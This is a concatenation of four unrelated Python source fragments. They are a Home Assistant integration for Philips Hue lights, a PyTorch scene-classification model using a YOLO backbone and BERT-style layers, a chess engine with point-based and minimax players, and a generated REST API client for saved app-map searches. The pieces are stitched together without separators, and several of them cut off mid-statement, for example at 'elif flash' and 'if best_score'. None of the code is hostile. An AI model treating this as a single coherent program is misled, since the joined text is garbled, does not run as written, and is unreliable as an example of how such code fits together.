SUPPORT_HUE_COLOR_TEMP = SUPPORT_HUE_DIMMABLE | SUPPORT_COLOR_TEMP
SUPPORT_HUE_COLOR = SUPPORT_HUE_DIMMABLE | SUPPORT_EFFECT | SUPPORT_COLOR
SUPPORT_HUE_EXTENDED = SUPPORT_HUE_COLOR_TEMP | SUPPORT_HUE_COLOR
SUPPORT_HUE = {
"Extended color light": SUPPORT_HUE_EXTENDED,
"Color light": SUPPORT_HUE_COLOR,
"Dimmable light": SUPPORT_HUE_DIMMABLE,
"On/Off plug-in unit": SUPPORT_HUE_ON_OFF,
"Color temperature light": SUPPORT_HUE_COLOR_TEMP,
}
ATTR_IS_HUE_GROUP = "is_hue_group"
GAMUT_TYPE_UNAVAILABLE = "None"
# Minimum Hue Bridge API version to support groups
# 1.4.0 introduced extended group info
# 1.12 introduced the state object for groups
# 1.13 introduced "any_on" to group state objects
GROUP_MIN_API_VERSION = (1, 13, 0)
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Old way of setting up Hue lights.
Can only be called when a user accidentally mentions hue platform in their
config. But even in that case it would have been ignored.
"""
def create_light(item_class, coordinator, bridge, is_group, rooms, api, item_id):
"""Create the light."""
api_item = api[item_id]
if is_group:
supported_features = 0
for light_id in api_item.lights:
if light_id not in bridge.api.lights:
continue
light = bridge.api.lights[light_id]
supported_features |= SUPPORT_HUE.get(light.type, SUPPORT_HUE_EXTENDED)
supported_features = supported_features or SUPPORT_HUE_EXTENDED
else:
supported_features = SUPPORT_HUE.get(api_item.type, SUPPORT_HUE_EXTENDED)
return item_class(
coordinator, bridge, is_group, api_item, supported_features, rooms
)
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the Hue lights from a config entry."""
bridge = hass.data[HUE_DOMAIN][config_entry.entry_id]
api_version = tuple(int(v) for v in bridge.api.config.apiversion.split("."))
rooms = {}
allow_groups = bridge.allow_groups
supports_groups = api_version >= GROUP_MIN_API_VERSION
if allow_groups and not supports_groups:
_LOGGER.warning("Please update your Hue bridge to support groups")
light_coordinator = DataUpdateCoordinator(
hass,
_LOGGER,
name="light",
update_method=partial(async_safe_fetch, bridge, bridge.api.lights.update),
update_interval=SCAN_INTERVAL,
request_refresh_debouncer=Debouncer(
bridge.hass, _LOGGER, cooldown=REQUEST_REFRESH_DELAY, immediate=True
),
)
# First do a refresh to see if we can reach the hub.
# Otherwise we will declare not ready.
await light_coordinator.async_refresh()
if not light_coordinator.last_update_success:
raise PlatformNotReady
if not supports_groups:
update_lights_without_group_support = partial(
async_update_items,
bridge,
bridge.api.lights,
{},
async_add_entities,
partial(create_light, HueLight, light_coordinator, bridge, False, rooms),
None,
)
# We add a listener after fetching the data, so manually trigger listener
bridge.reset_jobs.append(
light_coordinator.async_add_listener(update_lights_without_group_support)
)
return
group_coordinator = DataUpdateCoordinator(
hass,
_LOGGER,
name="group",
update_method=partial(async_safe_fetch, bridge, bridge.api.groups.update),
update_interval=SCAN_INTERVAL,
request_refresh_debouncer=Debouncer(
bridge.hass, _LOGGER, cooldown=REQUEST_REFRESH_DELAY, immediate=True
),
)
if allow_groups:
update_groups = partial(
async_update_items,
bridge,
bridge.api.groups,
{},
async_add_entities,
partial(create_light, HueLight, group_coordinator, bridge, True, None),
None,
)
bridge.reset_jobs.append(group_coordinator.async_add_listener(update_groups))
cancel_update_rooms_listener = None
@callback
def _async_update_rooms():
"""Update rooms."""
nonlocal cancel_update_rooms_listener
rooms.clear()
for item_id in bridge.api.groups:
group = bridge.api.groups[item_id]
if group.type != GROUP_TYPE_ROOM:
continue
for light_id in group.lights:
rooms[light_id] = group.name
# Once we do a rooms update, we cancel the listener
# until the next time lights are added
bridge.reset_jobs.remove(cancel_update_rooms_listener)
cancel_update_rooms_listener() # pylint: disable=not-callable
cancel_update_rooms_listener = None
@callback
def _setup_rooms_listener():
nonlocal cancel_update_rooms_listener
if cancel_update_rooms_listener is not None:
# If there are new lights added before _async_update_rooms
# is called we should not add another listener
return
cancel_update_rooms_listener = group_coordinator.async_add_listener(
_async_update_rooms
)
bridge.reset_jobs.append(cancel_update_rooms_listener)
_setup_rooms_listener()
await group_coordinator.async_refresh()
update_lights_with_group_support = partial(
async_update_items,
bridge,
bridge.api.lights,
{},
async_add_entities,
partial(create_light, HueLight, light_coordinator, bridge, False, rooms),
_setup_rooms_listener,
)
# We add a listener after fetching the data, so manually trigger listener
bridge.reset_jobs.append(
light_coordinator.async_add_listener(update_lights_with_group_support)
)
update_lights_with_group_support()
async def async_safe_fetch(bridge, fetch_method):
"""Safely fetch data."""
try:
with async_timeout.timeout(4):
return await bridge.async_request_call(fetch_method)
except aiohue.Unauthorized as err:
await bridge.handle_unauthorized_error()
raise UpdateFailed("Unauthorized") from err
except aiohue.AiohueException as err:
raise UpdateFailed(f"Hue error: {err}") from err
@callback
def async_update_items(
bridge, api, current, async_add_entities, create_item, new_items_callback
):
"""Update items."""
new_items = []
for item_id in api:
if item_id in current:
continue
current[item_id] = create_item(api, item_id)
new_items.append(current[item_id])
bridge.hass.async_create_task(remove_devices(bridge, api, current))
if new_items:
# This is currently used to setup the listener to update rooms
if new_items_callback:
new_items_callback()
async_add_entities(new_items)
def hue_brightness_to_hass(value):
"""Convert hue brightness 1..254 to hass format 0..255."""
return min(255, round((value / 254) * 255))
def hass_to_hue_brightness(value):
"""Convert hass brightness 0..255 to hue 1..254 scale."""
return max(1, round((value / 255) * 254))
class HueLight(CoordinatorEntity, LightEntity):
"""Representation of a Hue light."""
def __init__(self, coordinator, bridge, is_group, light, supported_features, rooms):
"""Initialize the light."""
super().__init__(coordinator)
self.light = light
self.bridge = bridge
self.is_group = is_group
self._supported_features = supported_features
self._rooms = rooms
if is_group:
self.is_osram = False
self.is_philips = False
self.is_innr = False
self.is_ewelink = False
self.is_livarno = False
self.gamut_typ = GAMUT_TYPE_UNAVAILABLE
self.gamut = None
else:
self.is_osram = light.manufacturername == "OSRAM"
self.is_philips = light.manufacturername == "Philips"
self.is_innr = light.manufacturername == "innr"
self.is_ewelink = light.manufacturername == "eWeLink"
self.is_livarno = light.manufacturername.startswith("_TZ3000_")
self.gamut_typ = self.light.colorgamuttype
self.gamut = self.light.colorgamut
_LOGGER.debug("Color gamut of %s: %s", self.name, str(self.gamut))
if self.light.swupdatestate == "readytoinstall":
err = (
"Please check for software updates of the %s "
"bulb in the Philips Hue App."
)
_LOGGER.warning(err, self.name)
if self.gamut and not color.check_valid_gamut(self.gamut):
err = "Color gamut of %s: %s, not valid, setting gamut to None."
_LOGGER.debug(err, self.name, str(self.gamut))
self.gamut_typ = GAMUT_TYPE_UNAVAILABLE
self.gamut = None
@property
def unique_id(self):
"""Return the unique ID of this Hue light."""
unique_id = self.light.uniqueid
if not unique_id and self.is_group and self.light.room:
unique_id = self.light.room["id"]
return unique_id
@property
def device_id(self):
"""Return the ID of this Hue light."""
return self.unique_id
@property
def name(self):
"""Return the name of the Hue light."""
return self.light.name
@property
def brightness(self):
"""Return the brightness of this light between 0..255."""
if self.is_group:
bri = self.light.action.get("bri")
else:
bri = self.light.state.get("bri")
if bri is None:
return bri
return hue_brightness_to_hass(bri)
@property
def _color_mode(self):
"""Return the hue color mode."""
if self.is_group:
return self.light.action.get("colormode")
return self.light.state.get("colormode")
@property
def hs_color(self):
"""Return the hs color value."""
mode = self._color_mode
source = self.light.action if self.is_group else self.light.state
if mode in ("xy", "hs") and "xy" in source:
return color.color_xy_to_hs(*source["xy"], self.gamut)
return None
@property
def color_temp(self):
"""Return the CT color value."""
# Don't return color temperature unless in color temperature mode
if self._color_mode != "ct":
return None
if self.is_group:
return self.light.action.get("ct")
return self.light.state.get("ct")
@property
def min_mireds(self):
"""Return the coldest color_temp that this light supports."""
if self.is_group:
return super().min_mireds
min_mireds = self.light.controlcapabilities.get("ct", {}).get("min")
# We filter out '0' too, which can be incorrectly reported by 3rd party buls
if not min_mireds:
return super().min_mireds
return min_mireds
@property
def max_mireds(self):
"""Return the warmest color_temp that this light supports."""
if self.is_group:
return super().max_mireds
if self.is_livarno:
return 500
max_mireds = self.light.controlcapabilities.get("ct", {}).get("max")
if not max_mireds:
return super().max_mireds
return max_mireds
@property
def is_on(self):
"""Return true if device is on."""
if self.is_group:
return self.light.state["any_on"]
return self.light.state["on"]
@property
def available(self):
"""Return if light is available."""
return self.coordinator.last_update_success and (
self.is_group
or self.bridge.allow_unreachable
or self.light.state["reachable"]
)
@property
def supported_features(self):
"""Flag supported features."""
return self._supported_features
@property
def effect(self):
"""Return the current effect."""
return self.light.state.get("effect", None)
@property
def effect_list(self):
"""Return the list of supported effects."""
if self.is_osram:
return [EFFECT_RANDOM]
return [EFFECT_COLORLOOP, EFFECT_RANDOM]
@property
def device_info(self) -> DeviceInfo | None:
"""Return the device info."""
if self.light.type in (
GROUP_TYPE_LIGHT_GROUP,
GROUP_TYPE_ROOM,
GROUP_TYPE_LUMINAIRE,
GROUP_TYPE_LIGHT_SOURCE,
):
return None
suggested_area = None
if self.light.id in self._rooms:
suggested_area = self._rooms[self.light.id]
return DeviceInfo(
identifiers={(HUE_DOMAIN, self.device_id)},
manufacturer=self.light.manufacturername,
# productname added in Hue Bridge API 1.24
# (published 03/05/2018)
model=self.light.productname or self.light.modelid,
name=self.name,
# Not yet exposed as properties in aiohue
suggested_area=suggested_area,
sw_version=self.light.raw["swversion"],
via_device=(HUE_DOMAIN, self.bridge.api.config.bridgeid),
)
async def async_added_to_hass(self) -> None:
"""Handle entity being added to Home Assistant."""
self.async_on_remove(
self.bridge.listen_updates(
self.light.ITEM_TYPE, self.light.id, self.async_write_ha_state
)
)
await super().async_added_to_hass()
async def async_turn_on(self, **kwargs):
"""Turn the specified or all lights on."""
command = {"on": True}
if ATTR_TRANSITION in kwargs:
command["transitiontime"] = int(kwargs[ATTR_TRANSITION] * 10)
if ATTR_HS_COLOR in kwargs:
if self.is_osram:
command["hue"] = int(kwargs[ATTR_HS_COLOR][0] / 360 * 65535)
command["sat"] = int(kwargs[ATTR_HS_COLOR][1] / 100 * 255)
else:
# Philips hue bulb models respond differently to hue/sat
# requests, so we convert to XY first to ensure a consistent
# color.
xy_color = color.color_hs_to_xy(*kwargs[ATTR_HS_COLOR], self.gamut)
command["xy"] = xy_color
elif ATTR_COLOR_TEMP in kwargs:
temp = kwargs[ATTR_COLOR_TEMP]
command["ct"] = max(self.min_mireds, min(temp, self.max_mireds))
if ATTR_BRIGHTNESS in kwargs:
command["bri"] = hass_to_hue_brightness(kwargs[ATTR_BRIGHTNESS])
flash = kwargs.get(ATTR_FLASH)
if flash == FLASH_LONG:
command["alert"] = "lselect"
del command["on"]
elif flash | |
import torch
import torch.nn as nn
from torchvision.datasets.vision import VisionDataset
from PIL import Image
import os, sys, math
import os.path
import torch
import json
import torch.utils.model_zoo as model_zoo
from Yolo_v2_pytorch.src.utils import *
from Yolo_v2_pytorch.src.yolo_net import Yolo
from Yolo_v2_pytorch.src.yolo_tunning import YoloD
import numpy as np
import torch.nn.functional as F
from Yolo_v2_pytorch.src.rois_utils import anchorboxes
from Yolo_v2_pytorch.src.anotherMissOh_dataset import FaceCLS
from lib.person_model import person_model
label_dict = {'' : 9, 'beach':0, 'cafe':1, 'car':2, 'convenience store':3, 'garden':4, 'home':5, 'hospital':6, 'kitchen':7,
'livingroom':8, 'none':9, 'office':10, 'park':11, 'playground':12, 'pub':13, 'restaurant':14, 'riverside':15, 'road':16,
'rooftop':17, 'room':18, 'studio':19, 'toilet':20, 'wedding hall':21
}
label_dict_wo_none = {'beach':0, 'cafe':1, 'car':2, 'convenience store':3, 'garden':4, 'home':5, 'hospital':6, 'kitchen':7,
'livingroom':8, 'none':9, 'office':10, 'park':11, 'playground':12, 'pub':13, 'restaurant':14, 'riverside':15, 'road':16,
'rooftop':17, 'room':18, 'studio':19, 'toilet':20, 'wedding hall':21
}
def label_mapping(target):
temp = []
for idx in range(len(target)):
if target[idx][0][:3] == 'con':
target[idx][0] = 'convenience store'
temp.append(label_dict[target[idx][0]])
return temp
def label_remapping(target):
inv_label_dict = {v: k for k, v in label_dict_wo_none.items()}
temp = []
for idx in range(len(target)):
temp.append(inv_label_dict[target[idx]])
return temp
def conv3x3(in_planes, out_planes, stride=1):
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, bias=False)
def accuracy(output, target, topk=(1,)):
"""Computes the accuracy over the k top predictions for the specified values of k"""
with torch.no_grad():
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)
res.append(correct_k.mul_(100.0 / batch_size))
return res
def place_buffer(images_norm, buffer_images):
if len(buffer_images) == 0:
buffer_images = images_norm
if len(buffer_images) < 10:
for idx in range(10-len(buffer_images)):
buffer_images = [images_norm[0]] + buffer_images
assert len(buffer_images) == 10, 'Buffer failed'
return buffer_images
class AverageMeter(object):
def __init__(self, name, fmt=':f'):
self.name = name
self.fmt = fmt
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def __str__(self):
fmtstr = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'
return fmtstr.format(**self.__dict__)
class ProgressMeter(object):
def __init__(self, num_batches, meters, prefix=""):
self.batch_fmtstr = self._get_batch_fmtstr(num_batches)
self.meters = meters
self.prefix = prefix
def display(self, batch):
entries = [self.prefix + self.batch_fmtstr.format(batch)]
entries += [str(meter) for meter in self.meters]
print('\t'.join(entries))
def _get_batch_fmtstr(self, num_batches):
num_digits = len(str(num_batches // 1))
fmt = '{:' + str(num_digits) + 'd}'
return '[' + fmt + '/' + fmt.format(num_batches) + ']'
sample_default = [105, 462, 953, 144, 108, 13, 123, 510, 1690, 19914, 1541, 126, 67, 592, 1010, 53, 2087, 0, 1547, 576, 74, 0]
def CB_loss(labels, logits, beta=0.99, gamma=0.5, samples_per_cls=sample_default, no_of_classes=22, loss_type='softmax'):
"""Compute the Class Balanced Loss between `logits` and the ground truth `labels`.
Class Balanced Loss: ((1-beta)/(1-beta^n))*Loss(labels, logits)
where Loss is one of the standard losses used for Neural Networks.
Args:
labels: A int tensor of size [batch].
logits: A float tensor of size [batch, no_of_classes].
samples_per_cls: A python list of size [no_of_classes].
no_of_classes: total number of classes. int
loss_type: string. One of "sigmoid", "focal", "softmax".
beta: float. Hyperparameter for Class balanced loss.
gamma: float. Hyperparameter for Focal loss.
Returns:
cb_loss: A float tensor representing class balanced loss
"""
effective_num = 1.0 - np.power(beta, samples_per_cls)
weights = (1.0 - beta) / np.array(effective_num)
weights = weights / np.sum(weights) * no_of_classes
labels_one_hot = F.one_hot(labels, no_of_classes).cpu().float()
weights = torch.tensor(weights).float()
weights = weights.unsqueeze(0)
weights = weights.repeat(labels_one_hot.shape[0],1) * labels_one_hot
weights = weights.sum(1)
weights = weights.unsqueeze(1)
weights = weights.repeat(1,no_of_classes)
if loss_type == "focal":
cb_loss = focal_loss(labels_one_hot.cuda(), logits, weights.cuda(), gamma)
elif loss_type == "sigmoid":
cb_loss = F.binary_cross_entropy_with_logits(input = logits,target = labels_one_hot, weights = weights)
elif loss_type == "softmax":
pred = logits.softmax(dim = 1)
cb_loss = F.binary_cross_entropy(input = pred, target = labels_one_hot.cuda(), weight = weights.cuda())
return cb_loss
def focal_loss(labels, logits, alpha, gamma):
"""Compute the focal loss between `logits` and the ground truth `labels`.
Focal loss = -alpha_t * (1-pt)^gamma * log(pt)
where pt is the probability of being classified to the true class.
pt = p (if true class), otherwise pt = 1 - p. p = sigmoid(logit).
Args:
labels: A float tensor of size [batch, num_classes].
logits: A float tensor of size [batch, num_classes].
alpha: A float tensor of size [batch_size]
specifying per-example weight for balanced cross entropy.
gamma: A float scalar modulating loss from hard and easy examples.
Returns:
focal_loss: A float32 scalar representing normalized total loss.
"""
BCLoss = F.binary_cross_entropy_with_logits(input = logits, target = labels,reduction = "none")
if gamma == 0.0:
modulator = 1.0
else:
modulator = torch.exp(-gamma * labels * logits - gamma * torch.log(1 +
torch.exp(-1.0 * logits)))
loss = modulator * BCLoss
weighted_loss = alpha * loss
focal_loss = torch.sum(weighted_loss)
focal_loss /= torch.sum(labels)
return focal_loss
class place_model(nn.Module):
def __init__(self, num_persons, num_faces, device):
super(place_model, self).__init__()
pre_model = Yolo(num_persons).cuda(device)
num_face_cls = num_faces
self.detector = YoloD(pre_model).cuda(device)
self.place_conv = nn.Sequential(nn.Conv2d(1024, 128, 3, 1, 1, bias=False), nn.BatchNorm2d(128),
nn.LeakyReLU(0.1, inplace=True), nn.MaxPool2d(2, 2))
self.avgpool = nn.AvgPool2d(7, stride=1)
# self.lstm_sc = torch.nn.LSTM(input_size=128, hidden_size=128, num_layers=2, batch_first=True)
# self.bert_fc1 = torch.nn.Linear(128, 768)
# self.bert_fc2 = torch.nn.Linear(768, 128)
self.bert = BERT()
self.fc2 = torch.nn.Linear(128, 1)
self.fc3 = torch.nn.Linear(128, 22)
self.softmax = torch.nn.Softmax(dim=1)
# # define face
# self.face_conv = nn.Conv2d(
# 1024, len(self.detector.anchors) * (5 + num_face_cls), 1, 1, 0, bias=False)
def forward(self, image):
N, T , C, H, W = image.size(0), image.size(1), image.size(2), image.size(3), image.size(4)
image = image.reshape(N*T, C, H, W)
# feature map of backbone
fmap, output_1 = self.detector(image)
fmap = self.place_conv(fmap)
x = self.avgpool(fmap)
x = x.reshape(N, T, -1)
# self.lstm_sc.flatten_parameters()
# N, T = x.size(0), x.size(1)
# x = self.lstm_sc(x)[0]
# x = self.bert_fc1(x)
x = self.bert(x)
# x = self.bert_fc2(x)
change = x.reshape(N*T, -1)
#x = self.fc1(x)
change = self.fc2(change)
change = change.reshape(N, T)
#x = x.reshape(N*T, -1)
M, _ = change.max(1)
w = change - M.view(-1,1)
w = w.exp()
w = w.unsqueeze(1).expand(-1,w.size(1),-1)
w = w.triu(1) - w.tril()
w = w.cumsum(2)
w = w - w.diagonal(dim1=1,dim2=2).unsqueeze(2)
ww = w.new_empty(w.size())
idx = M>=0
ww[idx] = w[idx] + M[idx].neg().exp().view(-1,1,1)
idx = ~idx
ww[idx] = M[idx].exp().view(-1,1,1)*w[idx] + 1
ww = (ww+1e-10).pow(-1)
ww = ww/ww.sum(1,True)
x = ww.transpose(1,2).bmm(x)
x = x.reshape(N*T, -1)
x = self.fc3(x)
x = x.reshape(N*T, -1)
return x
class BERT(nn.Module):
"""
BERT model : Bidirectional Encoder Representations from Transformers.
"""
def __init__(self, vocab_size=0, hidden=128, n_layers=5, attn_heads=8, dropout=0.):
"""
:param vocab_size: vocab_size of total words
:param hidden: BERT model hidden size
:param n_layers: numbers of Transformer blocks(layers)
:param attn_heads: number of attention heads
:param dropout: dropout rate
"""
super(BERT, self).__init__()
self.hidden = hidden
self.n_layers = n_layers
self.attn_heads = attn_heads
# paper noted they used 4*hidden_size for ff_network_hidden_size
self.feed_forward_hidden = hidden * 4
# embedding for BERT, sum of positional, segment, token embeddings
self.embedding = BERTEmbedding(vocab_size=vocab_size, embed_size=hidden)
# multi-layers transformer blocks, deep network
self.transformer_blocks = nn.ModuleList(
[TransformerBlock(hidden, attn_heads, hidden * 4, dropout) for _ in range(n_layers)])
def forward(self, x):
# attention masking for padded token
# torch.ByteTensor([batch_size, 1, seq_len, seq_len])
# mask = (x > 0).unsqueeze(1).repeat(1, x.size(1), 1).unsqueeze(1)
# embedding the indexed sequence to sequence of vectors
x = self.embedding(x)
# running over multiple transformer blocks
for transformer in self.transformer_blocks:
# x = transformer.forward(x, mask)
x = transformer.forward(x, None)
return x
class BERTEmbedding(nn.Module):
"""
BERT Embedding which is consisted with under features
1. TokenEmbedding : normal embedding matrix
2. PositionalEmbedding : adding positional information using sin, cos
2. SegmentEmbedding : adding sentence segment info, (sent_A:1, sent_B:2)
sum of all these features are output of BERTEmbedding
"""
def __init__(self, vocab_size, embed_size, dropout=0.):
"""
:param vocab_size: total vocab size
:param embed_size: embedding size of token embedding
:param dropout: dropout rate
"""
super(BERTEmbedding, self).__init__()
# self.token = TokenEmbedding(vocab_size=vocab_size, embed_size=embed_size)
# self.position = PositionalEmbedding(d_model=self.token.embedding_dim)
# self.segment = SegmentEmbedding(embed_size=self.token.embedding_dim)
self.position = PositionalEmbedding(d_model=embed_size)
self.dropout = nn.Dropout(p=dropout)
self.embed_size = embed_size
def forward(self, sequence):
# x = self.token(sequence) + self.position(sequence) + self.segment(segment_label)
x = sequence + self.position(sequence)
return self.dropout(x)
class PositionalEmbedding(nn.Module):
def __init__(self, d_model, max_len=512):
super(PositionalEmbedding, self).__init__()
# Compute the positional encodings once in log space.
pe = torch.zeros(max_len, d_model).float()
pe.require_grad = False
position = torch.arange(0, max_len).float().unsqueeze(1)
div_term = (torch.arange(0, d_model, 2).float() * -(math.log(10000.0) / d_model)).exp()
pe[:, 0::2] = torch.sin(position * div_term)
pe[:, 1::2] = torch.cos(position * div_term)
pe = pe.unsqueeze(0)
self.register_buffer('pe', pe)
| |
advanced_end_game_piece_score(piece_type, position, color):
if color == chess.WHITE:
if piece_type == chess.PAWN:
# pawn score at the given position based on the modifier + the value of the piece
return end_game_white_pawn_modifier[position] + 10
elif piece_type == chess.KNIGHT:
# pawn score at the given position based on the modifier + the value of the piece
return white_knight_modifier[position] + 35
elif piece_type == chess.BISHOP:
# pawn score at the given position based on the modifier + the value of the piece
return white_bishop_modifier[position] + 35
elif piece_type == chess.ROOK:
# pawn score at the given position based on the modifier + the value of the piece
return white_rook_modifier[position] + 52.5
elif piece_type == chess.QUEEN:
# pawn score at the given position based on the modifier + the value of the piece
return white_queen_modifier[position] + 100
elif piece_type == chess.KING:
# pawn score at the given position based on the modifier + the value of the piece
return white_king_modifier[position] + 1000
elif color == chess.BLACK:
if piece_type == chess.PAWN:
# pawn score at the given position based on the modifier + the value of the piece
return end_game_black_pawn_modifier[position] + 10
elif piece_type == chess.KNIGHT:
# pawn score at the given position based on the modifier + the value of the piece
return black_knight_modifier[position] + 30
elif piece_type == chess.BISHOP:
# pawn score at the given position based on the modifier + the value of the piece
return black_bishop_modifier[position] + 30
elif piece_type == chess.ROOK:
# pawn score at the given position based on the modifier + the value of the piece
return black_rook_modifier[position] + 50
elif piece_type == chess.QUEEN:
# pawn score at the given position based on the modifier + the value of the piece
return black_queen_modifier[position] + 90
elif piece_type == chess.KING:
# pawn score at the given position based on the modifier + the value of the piece
return black_king_modifier[position] + 1000
class ChessAI:
def __init__(self, color=None):
# the board used for calculating AI moves
self.board = AIBoard()
# set the AI's color
if color == "w":
self.color = chess.WHITE
elif color == "b":
self.color = chess.BLACK
# allow a change in the AI's color
def change_color(self, color=None):
# set the AI's color
if color == "w":
self.color = chess.WHITE
elif color == "b":
self.color = chess.BLACK
# get the AI's move from a given fen
def get_move(self, fen):
return
# ai that returns a random move
class RandomAI(ChessAI):
def __init__(self, color=None):
super().__init__(color)
def get_move(self, fen):
self.board.set_fen(fen)
return self.board.random_move()
# ai will choose the move that will result in it having the highest point value
class PointAI(ChessAI):
def __init__(self, color=None):
super().__init__(color)
# get the AI's move from a given fen
def get_move(self, fen):
self.board.set_fen(fen)
# keeps track of the move that results in the highest score for the AI and what that score is
best_move = None
best_score = -9999
# keeps track of neutral moves, if the AI's best score is the same as it's current then choose from the neutral
# move pool
neutral_score = self.board.calculate_score(self.color)
neutral_moves = []
for move in self.board.legal_moves:
# make the move
self.board.push(move)
# if the resulting score of the current move is higher than the best resulting score found so fare set it as
# the new best move and score
if self.board.calculate_score(self.color) > best_score:
best_move = move
best_score = self.board.calculate_score(self.color)
elif self.board.calculate_score(self.color) == neutral_score:
neutral_moves.append(move)
# undo the move
self.board.pop()
# if no best move was found then choose from one of the neutral moves
if best_score == neutral_score:
try:
best_move = random.choice(neutral_moves)
except IndexError:
best_move = self.board.random_move()
return best_move
# ai will choose the move that will result in it having the highest point value (using advanced point calcs)
class AdvancedPointAI(ChessAI):
def __init__(self, color=None):
super().__init__(color)
# get the AI's move from a given fen
def get_move(self, fen):
self.board.set_fen(fen)
# keeps track of the move that results in the highest score for the AI and what that score is
best_move = None
best_score = -9999
# keeps track of neutral moves, if the AI's best score is the same as it's current then choose from the neutral
# move pool
neutral_score = self.board.calculate_score(self.color)
neutral_moves = []
for move in self.board.legal_moves:
# make the move
self.board.push(move)
# if the resulting score of the current move is higher than the best resulting score found so fare set it as
# the new best move and score
if self.board.calculate_advanced_score(self.color) > best_score:
best_move = move
best_score = self.board.calculate_advanced_score(self.color)
elif self.board.calculate_score(self.color) == neutral_score:
neutral_moves.append(move)
# undo the move
self.board.pop()
# if no best move was found then choose from one of the neutral moves
if best_score == neutral_score:
try:
best_move = random.choice(neutral_moves)
except IndexError:
best_move = self.board.random_move()
return best_move
# minmax AI using basic scoring
class MiniMaxAI(ChessAI):
def __init__(self, color=None):
super().__init__(color)
# get the AI's move from a given fen
def get_move(self, fen):
self.board.set_fen(fen)
# keeps track of the move that results in the highest score for the AI and what that score is
best_move = None
best_score = -9999
# keeps track of neutral moves, if the AI's best score is the same as it's current then choose from the neutral
# move pool
neutral_score = self.board.calculate_score(self.color)
neutral_moves = []
# find the best of the legal moves
for move in self.board.legal_moves:
# make the move
self.board.push(move)
# calculate the score
score = self.minmax(2, -10000, 10000, False)
# undo the move
self.board.pop()
# if the score is higher than the current best score then set the best move and best_score
if best_score <= score:
best_move = move
best_score = score
elif score == neutral_score:
neutral_moves.append(move)
# if no best move was found then choose from one of the neutral moves
if best_score == neutral_score:
try:
best_move = random.choice(neutral_moves)
except IndexError:
best_move = self.board.random_move()
return best_move
# minmax search algorithm using alpha-beta pruning
def minmax(self, depth, alpha, beta, is_maximizing):
# if the depth is zero then calculate the point value of the position
if depth == 0:
score = self.board.calculate_score(self.color)
return score
# list of valid moves
valid_moves = self.board.valid_moves()
if is_maximizing:
# keep track of the best score
best_score = -9999
for move in valid_moves:
# make a move
self.board.push(move)
# check if the calculated score is higher than the current best score
best_score = max(best_score, self.minmax(depth - 1, alpha, beta, not is_maximizing))
# reverse the move
self.board.pop()
# alpha beta pruning return
if best_score >= beta:
return best_score
# calculate the new alpha
alpha = max(alpha, best_score)
# fallback return if no pruning occurs
return best_score
else:
# keep track of the best score
best_score = 9999
for move in valid_moves:
# make a move
self.board.push(move)
# check if the calculated score is higher than the current best score
best_score = min(best_score, self.minmax(depth - 1, alpha, beta, not is_maximizing))
# reverse the move
self.board.pop()
# alpha beta pruning return
if best_score <= alpha:
return best_score
# calculate the new beta
beta = min(beta, best_score)
# fallback return if no pruning occurs
return best_score
# minmax AI using basic scoring
class AdvancedMiniMaxAI(ChessAI):
def __init__(self, color=None):
super().__init__(color)
# get the AI's move from a given fen
def get_move(self, fen):
self.board.set_fen(fen)
# keeps track of the move that results in the highest score for the AI and what that score is
best_move = None
best_score = -9999
# keeps track of neutral moves, if the AI's best score is the same as it's current then choose from the neutral
# move pool
neutral_score = self.board.calculate_advanced_score(self.color)
neutral_moves = []
# number of valid moves
num_pieces = self.board.count_pieces()
# find the best of the legal moves
for move in self.board.legal_moves:
# make the move
self.board.push(move)
# # count pieces
self.board.count_pieces()
score = self.minmax(2, -10000, 10000, False)
# undo the move
self.board.pop()
# if the score is higher than the current best score then set the best move and best_score
if best_score | |
in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/savedappmapsearch', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerPagedSavedAppMapSearch', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_all_saved_app_map_searches_for_user(self, **kwargs): # noqa: E501
"""Get all searches for a user # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_saved_app_map_searches_for_user(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset:
:param int limit:
:return: ResponseContainerPagedSavedAppMapSearch
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_all_saved_app_map_searches_for_user_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_all_saved_app_map_searches_for_user_with_http_info(**kwargs) # noqa: E501
return data
def get_all_saved_app_map_searches_for_user_with_http_info(self, **kwargs): # noqa: E501
"""Get all searches for a user # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_saved_app_map_searches_for_user_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset:
:param int limit:
:return: ResponseContainerPagedSavedAppMapSearch
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['offset', 'limit'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_saved_app_map_searches_for_user" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'offset' in params:
